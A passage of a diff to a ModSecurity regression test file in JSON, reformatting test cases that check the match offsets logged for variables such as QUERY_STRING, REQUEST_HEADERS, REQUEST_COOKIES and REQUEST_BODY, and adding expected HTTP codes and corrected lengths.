] }, - "expected":{ - "error_log":"o5,3v58,8t:trim" + "expected": { + "error_log": "o5,3v58,8t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_PROTOCOL \"1.1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - PATH_INFO", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - PATH_INFO", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o1,5v4,11t:trim" + "expected": { + "error_log": "o1,5v4,11t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule PATH_INFO \"index\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - QUERY_STRING", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - QUERY_STRING", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o7,6v16,41t:trim" + "expected": { + "error_log": "o7,6v16,41t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule QUERY_STRING \"value1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_BASENAME", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_BASENAME", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o6,4v5,10t:trim" + "expected": { + "error_log": "o6,4v5,10t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_BASENAME \"html\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_URI", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_URI", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html%20%20?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html%20%20?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o7,4v4,59t:trim" + "expected": { + "error_log": "o7,4v4,59t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_URI \"html\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_URI_RAW", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_URI_RAW", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html%20%20?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html%20%20?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o7,4v4,59t:trim" + "expected": { + "error_log": "o7,4v4,59t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_URI_RAW \"html\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_HEADERS", - "request":{ - "headers":{ - "Content-Length": "27", - "Host":"localhost", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_HEADERS", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0", + "Host": "localhost", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,9v89,9t:trim" + "expected": { + "error_log": "o0,9v88,9t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS \"localhost\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_HEADERS:content-type", - "request":{ - "headers":{ - "Content-Length": "27", - "Host":"localhost", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_HEADERS:content-type", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0", + "Host": "localhost", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o14,3v163,33t:trim" + "expected": { + "error_log": "o14,3v162,33t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS \"www\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - AUTH_TYPE 1", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - AUTH_TYPE 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,5v162,5t:trim" + "expected": { + "error_log": "o0,5v161,5t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule AUTH_TYPE \"Basic\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - AUTH_TYPE 2", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - AUTH_TYPE 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", - "Content-Length": "27", + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,5v79,5t:trim" + "expected": { + "error_log": "o0,5v79,5t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule AUTH_TYPE \"Basic\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_HEADERS_NAMES", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_HEADERS_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", - "Content-Length": "27", + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,4v64,13t:lowercase" + "expected": { + "error_log": "o0,4v64,13t:lowercase", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS_NAMES \"auth\" \"id:1,phase:2,pass,t:lowercase,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES 1", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", - "Content-Length": "27", + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o1,2v216,3t:lowercase" + "expected": { + "error_log": "o1,2v215,3t:lowercase", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES \"es\" \"id:1,phase:2,pass,t:lowercase,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES 2", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", - "Content-Length": "27", + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,1v223,1t:lowercase" + "expected": { + "error_log": "o0,1v222,1t:lowercase", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES \"z\" \"id:1,phase:2,pass,t:lowercase,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES 3", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES 3", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", - "Content-Length": "27", + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,1v228,1t:lowercase,t:trim" + "expected": { + "error_log": "o0,1v227,1t:lowercase,t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES \"b\" \"id:1,phase:2,pass,t:lowercase,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_COOKIES_NAMES", - "request":{ - "headers":{ + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_COOKIES_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", - "Host":"localhost", - "Content-Length": "27", + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", - "Cookie":"USER_TOKEN=Yes; a=z; t=b" + "Cookie": "USER_TOKEN=Yes; a=z; t=b" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,1v226,1" + "expected": { + "error_log": "o0,1v225,1", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_COOKIES_NAMES \"t\" \"id:1,phase:2,pass,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REMOTE_USER", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"27", - "Content-Type":"application/x-www-form-urlencoded", + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REMOTE_USER", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpPcGVuU2VzYW1l" }, - "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", - "method":"GET" + "uri": "/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,7v198,30t:trim" + "expected": { + "error_log": "o0,7v197,30t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REMOTE_USER \"Aladdin\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_BODY", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_BODY", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "516", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + 
"----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o45,30v193,516t:trim" + "expected": { + "error_log": "o45,30v193,516t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_BODY \"Content-Disposition: form-data\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_BODY", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 
300000, + "title": "Testing Variables :: REQUEST_BODY", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "516", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o45,30v193,516t:trim" + "expected": { + "error_log": "o45,30v193,516t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_BODY \"Content-Disposition: form-data\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_BODY_LENGTH", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - 
"----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_BODY_LENGTH", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "516", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"v193,516t:trim" + "expected": { + "error_log": "v193,516t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess 
On", "SecRule REQUEST_BODY_LENGTH \"@gt 5\" \"id:1,phase:3,pass,t:trim,msg:'s'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: REQUEST_FILENAME 1", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/file?something else", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables :: REQUEST_FILENAME 1", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "501", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/file?something else", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 
